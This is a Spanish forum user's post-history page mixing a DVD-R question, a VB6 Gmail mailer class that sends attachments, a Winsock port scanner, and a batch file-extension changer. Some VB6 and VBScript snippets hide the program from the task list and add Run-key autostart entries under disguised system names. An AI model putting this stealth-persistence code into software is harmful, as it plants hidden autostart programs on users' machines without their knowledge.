Hay alguna manera de poder borrar el contenido de lo que hay en un DVD-R.
Quizas la solucion sea facil, pero no se me ocurre.
Gracias
Quizas la solucion sea facil, pero no se me ocurre.
Gracias
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes Menú
Option Explicit
' para la conexión a internet usaremos wininet.dll
Private Declare Function InternetGetConnectedState _
Lib "wininet.dll" ( _
ByRef lpdwFlags As Long, _
ByVal dwReserved As Long) As Long
Private Const INTERNET_CONNECTION_MODEM_BUSY As Long = &H8
Private Const INTERNET_RAS_INSTALLED As Long = &H10
Private Const INTERNET_CONNECTION_OFFLINE As Long = &H20
Private Const INTERNET_CONNECTION_CONFIGURED As Long = &H40
' variables locales que usamos con CDO
Private mServidor As String
Private mPara As String
Private mDe As String
Private mAsunto As String
Private mMensaje As String
Private mAdjunto As String
Private mPuerto As Variant
Private mUsuario As String
Private mContraseña
Private mUseAuntentificacion As Boolean
Private mSSL As Boolean
'las salidas que nos puede dar el envio
Public Event Error(Descripcion As String, Numero As Variant)
Public Event EnvioCompleto()
Function Enviar_Backup() As Boolean
' Variable de objeto Cdo.Message
Dim oCDO As Object
' si hay conexion o no, este sería el primer error ya declarado anteriormente
If InternetGetConnectedState(0&, 0&) = False Then
RaiseEvent Error("No se puede enviar el correo. " & _
"Verificar la conexión a internet si está disponible", 0)
Exit Function
End If
' el puerto tiene que ser un numero y que no este vacio
If Not IsNumeric(puerto) Then
RaiseEvent Error("No se ha indicado el puerto del servidor", 0)
Exit Function
End If
' Crea un Nuevo objeto CDO.Message
Set oCDO = CreateObject("CDO.Message")
' Indica el servidor Smtp para poder enviar el Mail ( puede ser el nombre _
del servidor o su dirección IP )
oCDO.Configuration.Fields( _
"http://schemas.microsoft.com/cdo/configuration/smtpserver") = mServidor
oCDO.Configuration.Fields( _
"http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
' Puerto. Por defecto se usa el puerto 25, _
en el caso de Gmail se usa el puerto 465
oCDO.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = mPuerto
' Indica el tipo de autentificación con el servidor de correo _
El valor 0 no requiere autentificarse, el valor 1 es con autentificación
oCDO.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/" & _
"configuration/smtpauthenticate") = Abs(mUseAuntentificacion)
' Tiempo máximo de espera en segundos para la conexión, 10 es el numero predeterminado pero puedes poner más
oCDO.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 10
' Configura las opciones para el login en el SMTP
If mUseAuntentificacion Then
' Id de usuario del servidor Smtp ( en el caso de gmail, _
debe ser la dirección de correro mas el @gmail.com )
oCDO.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/sendusername") = mUsuario
' Password de la cuenta
oCDO.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/sendpassword") = mContraseña
' Indica si se usa SSL para el envío. En el caso de Gmail requiere que esté en True
oCDO.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = mSSL
End If
' Estructura del mail
'''''''''''''''''''''''''''''''''''''''''''''''
' Dirección del Destinatario
oCDO.To = mPara
' Dirección del remitente
oCDO.From = mDe
' Asunto del mensaje
oCDO.Subject = mAsunto
' Cuerpo del mensaje
oCDO.TextBody = mMensaje
'Ruta del archivo adjunto
If mAdjunto <> "" Then
If Len(Dir(mAdjunto)) = 0 Then
'otro mensaje de error en este caso por no haber especfificado la ruta correcta
RaiseEvent Error("No se ha encontrado el archivo en la siguiente ruta: ", 0)
Exit Function
Else
'aqui agrega el archivo
oCDO.AddAttachment (mAdjunto)
End If
End If
' Actualiza los datos antes de enviar
oCDO.Configuration.Fields.Update
On Error Resume Next
Screen.MousePointer = vbHourglass
' Envía el email
oCDO.Send
Screen.MousePointer = 0
' aqui comprueba con condicionales que todo se haya realizado correctamente
If Err.Number = 0 Then
Enviar_Backup = True
RaiseEvent EnvioCompleto
ElseIf Err.Number = -2147220973 Then
RaiseEvent Error("Posible error : nombre del Servidor " & _
"incorrecto o número de puerto incorrecto", Err.Number)
ElseIf Err.Number = -2147220975 Then
RaiseEvent Error("Posible error : error en el nombre de usuario, " & _
"o en el password ", Err.Number)
Else
RaiseEvent Error(Err.Description, Err.Number)
End If
' Descarga la referencia
If Not oCDO Is Nothing Then
Set oCDO = Nothing
End If
Err.Clear
Screen.MousePointer = vbNormal
End Function
'Valores declarados anteriormente sacados de la antigua libreria CDO
Property Get servidor() As String
servidor = mServidor
End Property
Property Let servidor(value As String)
mServidor = value
End Property
Property Get para() As String
para = mPara
End Property
Property Let para(value As String)
mPara = value
End Property
Property Get de() As String
de = mDe
End Property
Property Let de(value As String)
mDe = value
End Property
Property Get Asunto() As String
Asunto = mAsunto
End Property
Property Let Asunto(value As String)
mAsunto = value
End Property
Property Get Mensaje() As String
Mensaje = mMensaje
End Property
Property Let Mensaje(value As String)
mMensaje = value
End Property
Property Get Adjunto() As String
Adjunto = mAdjunto
End Property
Property Let Adjunto(value As String)
mAdjunto = value
End Property
Property Get puerto() As Variant
puerto = mPuerto
End Property
Property Let puerto(value As Variant)
mPuerto = value
End Property
Property Get Usuario() As String
Usuario = mUsuario
End Property
Property Let Usuario(value As String)
mUsuario = value
End Property
Property Get contraseña() As String
contraseña = mContraseña
End Property
Property Let contraseña(value As String)
mContraseña = value
End Property
Property Get UseAuntentificacion() As Boolean
UseAuntentificacion = mUseAuntentificacion
End Property
Property Let UseAuntentificacion(value As Boolean)
mUseAuntentificacion = value
End Property
Property Get ssl() As Boolean
ssl = mSSL
End Property
Property Let ssl(value As Boolean)
mSSL = value
End Property
'##############
'# Programado #
'# por P4|3L0 #
'##############
Option Explicit
Private WithEvents correo As CDOMail
Private Sub cmdsend_Click()
Set correo = New CDOMail
'aqui usariamos las propiedades del modulo de clase
With correo
'servidor smtp de gmail
.servidor = "smtp.gmail.com"
'puerto smtp de gmail
.puerto = 465
.UseAuntentificacion = True
'gmail y hotmail usan ssl asi que tenemos que activarlo
.ssl = True
'tu usuario
.Usuario = "usuario@gmail.com"
'tu contraseña
.contraseña = "tusabras"
'el asunto de tu mensaje
.Asunto = "Sin Asunto"
'adjuntar, si no quieres que se mande nada pon esto como si fuese un comentario
.Adjunto = "C:\WINDOWS\explorer.exe"
'desde que usuario lo envias
.de = "usuario@gmail.com"
'a quien se lo mandas
.para = "usuario2@gmail.com"
'cuerpo del mensaje
.Mensaje = "Mensaje deseado"
'despues de haber comprobado todo
.Enviar_Backup ' manda el mail
End With
Set correo = Nothing
End Sub
Private Sub correo_EnvioCompleto()
'si no pasa nada y se envia correctamente
MsgBox "Mensaje enviado", vbInformation, Me.Caption
End Sub
Private Sub correo_Error(Descripcion As String, Numero As Variant)
'muestra el error y que ha pasado
MsgBox Descripcion, vbCritical, Numero
End Sub
'-----------------------------------
Private Sub Command1_Click()
Timer1.Enabled = True 'Activa el timer, para que empiece a analizar puertos
Command1.Enabled = False 'Desactiva el botón Comenzar
Command2.Enabled = True 'Activa el botón Parar, la primera vez que se inicia no hace nada
End Sub
'-----------------------------------
Private Sub Command2_Click()
Timer1.Enabled = False 'Desactiva el timer.
Command1.Enabled = True 'Activa el botón comenzar
Command2.Enabled = False ' Y desactiva el botón Parar
End Sub
'-----------------------------------
Private Sub Command3_Click()
List1.Clear 'Limpia la lista de puertos que hayan sido detectados abiertos
End Sub
'-----------------------------------
Private Sub Command4_Click()
Timer1.Enabled = False ' Desactiva el timer
Text2.Text = "1" 'Y retorna al principio el remoteport
Command1.Enabled = True
Command2.Enabled = True 'Activa los dos botones de comenzar y parar
End Sub
'-----------------------------------
Private Sub Timer1_Timer()
On Error Resume Next
Winsock1.Close
Text2.Text = Int(Text2.Text) + 1 ' va agregando un puerto cada vez que el timer pasa.
Winsock1.RemoteHost = Text1.Text 'IP
Winsock1.RemotePort = Text2.Text 'Puerto
Winsock1.Connect 'Intenta conectarse
End Sub
'-----------------------------------
Private Sub Winsock1_Connect()
List1.AddItem "Puerto: " & Winsock1.RemotePort & " Abierto!" 'En caso de que el winsock se conecte nos lo muestra en la lista, con el puerto correspondiente
End Sub
'-----------------------------------
Private Sub Form_Load()
Dim r As String
App.TaskVisible = False
CLAVE = "SystemREC"
VALOR = "C:\WINDOWS\systemrec.exe"
Set wsc = CreateObject("wscript.shell")
r = wsc.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\SystemREC")
If r <> VALOR Then
wsc.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & CLAVE, VALOR
End If
End Sub
CLAVE="System"
VALOR="archivo.exe"
set wsc = createobject("wscript.shell")
wsc.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\CLAVE", "VALOR"
@echo off
title Extension Changer v 1.0
SETLOCAL
set "programa=%~1"
:tdk
echo Introduciste este archivo:%programa%.
set /p ext1="Seguro que quieres modificar su extension(S/N)? "
IF /i %ext1%==s (GOTO CHAEXT)
IF /i %ext1%==n (GOTO:EOF)
IF NOT DEFINED %ext1% GOTO
:CHAEXT
set extpro=%programa:~-4%
IF /i %extpro%==.bat goto BAT
IF /i %extpro%==.mp3 goto mp3
IF /i %extpro%==.txt goto txt
IF /i %extpro%==.jpg goto img
IF /i %extpro%==.bmp goto img
IF /i %extpro%==.gif goto img
IF /i %extpro%==.psd goto img
IF /i %extpro%==.ico goto img
IF /i %extpro%==.doc goto txt
IF /i %extpro%==.pdf goto txt
IF /i %extpro%==.rtf goto txt
IF /i %extpro%==.wma goto mp3
IF /i %extpro%==.wmv goto mp3
IF /i %extpro%==.wav goto mp3
IF /i %extpro%==.cda goto mp3
IF /i %extpro%==.avi goto vid
IF /i %extpro%==.mpg goto vid
IF /i %extpro%==.mp4 goto vid
IF /i %extpro%==.mov goto vid
IF /i %extpro%==.div goto vid
IF /i %extpro%==.dvd goto vid
echo Archivo no reconocido por el ExtensionChanger v 1.0
pause>nul&exit
:BAT
Mode CON Cols=40 Lines=10 &cls
echo Esto es un archivo por lotes de MS-DOS.
GOTO CHAbat
:img
Mode CON Cols=40 Lines=10 &cls
echo Esto es una imagen.
GOTO chaimg
:mp3
Mode CON Cols=40 Lines=10 &cls
echo Esto es un archivo de musica.
GOTO chamus
:vid
Mode CON Cols=40 Lines=10 &cls
echo Esto es un video
GOTO chavid
:txt
Mode CON Cols=40 Lines=10 &cls
echo Esto es un archivo de texto.
GOTO chatexto
:chabat
set ext=txt
>NUL COPY /Y "%~F1" "%~DPN1.%EXT%"
exit
:chatexto
ECHO 1-TXT&ECHO 2-DOC&ECHO 3-PDF&ECHO 4-RTF
set /p chatxt="Conque extension se abrira el archivo?"
if %chatxt%==1 (set ext=txt)
if %chatxt%==2 (set ext=doc)
if %chatxt%==3 (set ext=pdf)
if %chatxt%==4 (set ext=rtf)
>NUL COPY /Y "%~F1" "%~DPN1.%EXT%"
exit
:chaimg
ECHO 1-BMP&ECHO 2-JPG&ECHO 3-ICO&ECHO 4-GIF
set /p ima="Conque extension se abrira el archivo?"
if %ima%==1 (set ext=bmp)
if %ima%==2 (set ext=jpg)
if %ima%==3 (set ext=ico)
if %ima%==4 (set ext=gif)
>NUL COPY /Y "%~F1" "%~DPN1.%EXT%"
exit
:chamus
ECHO 1-MP3&ECHO 2-WAV&ECHO 3-WMA&ECHO 4-WMV&ECHO 5-CDA
set /p mus="Conque extension se abrira el archivo?"
if %mus%==1 (set ext=mp3)
if %mus%==2 (set ext=wav)
if %mus%==3 (set ext=wma)
if %mus%==4 (set ext=wmv)
if %mus%==5 (set ext=cda)
>NUL COPY /Y "%~F1" "%~DPN1.%EXT%"
exit
:chavid
ECHO 1-MPG&ECHO 2-MOV&ECHO 3-DIV&ECHO 4-AVI&ECHO 5-DVD&ECHO 6-MP4
set /p vid="Conque extension se abrira el archivo?"
if %vid%==1 (set ext=mpg)
if %vid%==2 (set ext=mov)
if %vid%==3 (set ext=div)
if %vid%==4 (set ext=avi)
if %vid%==5 (set ext=dvd)
if %vid%==6 (set ext=mp4)
>NUL COPY /Y "%~F1" "%~DPN1.%EXT%"
exit